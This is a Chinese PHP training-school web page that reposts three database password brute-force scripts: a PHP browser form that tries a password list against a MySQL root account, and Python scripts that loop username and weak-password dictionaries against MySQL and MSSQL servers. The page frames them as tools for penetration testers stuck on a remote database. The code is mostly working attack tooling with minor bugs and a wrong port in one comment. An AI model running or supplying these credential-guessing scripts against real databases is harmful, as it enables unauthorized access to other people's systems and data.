太原PHP培训
达内太原php培训中心

0351-5608878

热门课程

MYSQL和MSSQL数据库账号密码猜解脚本PHP版+Python版

  • 时间:2016-10-20
  • 发布:指尖安全
  • 来源:指尖安全

MYSQL和MSSQL数据库账号密码猜解脚本PHP版+Python版

数据库是我们编程过程中经常用的,因此对于他们熟悉是很重要的。太原php培训班为大家讲解一下。

数据库账号密码猜解脚本PHP+Python

一、Mysql PHP版本爆破小脚本(注意:从代码可以看出用户名是个变量,一般数据库账号不会变,所以用户名没用数组作为字典。密码是用数组作为字典。字典可根据规矩扩展,破解的成功与失败,就看你扩展的字典强大不强大了。用法:保存代码为MysqlDatabaseBlasting.php,浏览器打开就可使用。 )

/*

* authorBearcat 2016-10-5

*/

MysqlDatabaseBlasting(Mysql账号密码在线爆破工具 V1.0)

if(@$_POST['submit']){

$host = @$_POST['host'];

if($host!=""){

$username = "root";//用户名字典

$password = array('','123456','admin','root','ccf304vn'); //密码字典

echo "

--------------------爆破状态--------------------

";

echo "密码错误次数:";

for ($i=0; $i <= count($password); $i++) {

if(@mysql_connect($host, $username, $password[$i])){

echo "

爆破成功--密码-->".@$password[$i]."";

break;

}else{

echo $i."";

continue;

}

}

echo "

--------------------爆破结束--------------------

";

}else{

echo "";

}

}

?>

数据库IP地址:

演示:

二、Mysql Python版本爆破小脚本,需要安装Python插件MySQL-python.exe,可以看出代码量很少,(注意:里用户名和密码都是类似字典。用法:保存代码为MysqlDatabaseBlasting.pycmd切换到 MysqlDatabaseBlasting.py路径下,并 执行 MysqlDatabaseBlasting.py即可开始破解 )

import MySQLdb

#coding=gbk

#目标IP mysql数据库必须开启3360远程登陆端口

mysql_username = ('root','test', 'admin', 'user')#账号字典

common_weak_password = ('','123456','test','root','admin','user')#密码字典

success = False

host = "127.0.0.1"#数据库IP地址

port = 3306

for username in mysql_username:

for password in common_weak_password:

try:

db = MySQLdb.connect(host, username, password)

success = True

if success:

print username, password

except Exception, e:

pass

演示:

三、Mssql Python版本爆破小脚本,需要安装 MSSQL-python.exe 可以看出代码量很少,参考二的用法

import pymssql

common_weak_password = ('','123456','test','root','admin','user')#密码字典

mssql_username = ('sa', 'test', 'admin', 'mssql')#账号字典

success = False

host = "127.0.0.1"#数据库IP地址

port = 1443

for username in mssql_username:

for password in common_weak_password:

try:

db = pymssql.connect(server=host, port=port, user=username, password=password)

success = True

if success:

print username, password

except Exception, e:

pass

说明:看到很多网络安全爱好者,在进行渗透测试的时候,遇到数据库可以远程管理,但是无法破解其账号密码,所以此篇文章就推送几个脚本进行渗透。

今天就给大家讲这么多吧,喜欢我的内容可以关注或者分享(微信公众平台:tytedu)选择太原达内培训,不再孤军奋战,轻轻松松做IT高薪白领。太原达内培训带领有明确目标的学子迈向成功之路!

上一篇:QQ音乐在线听歌网站系统
下一篇:PHP 中使用 Redis

PHP中十六个魔术方法详解(三)

JavaScript 与 Java、PHP 的比较

太原php培训资源站

太原PHP编程开发并发编程槽与坑

选择城市和中心
贵州省

广西省

海南省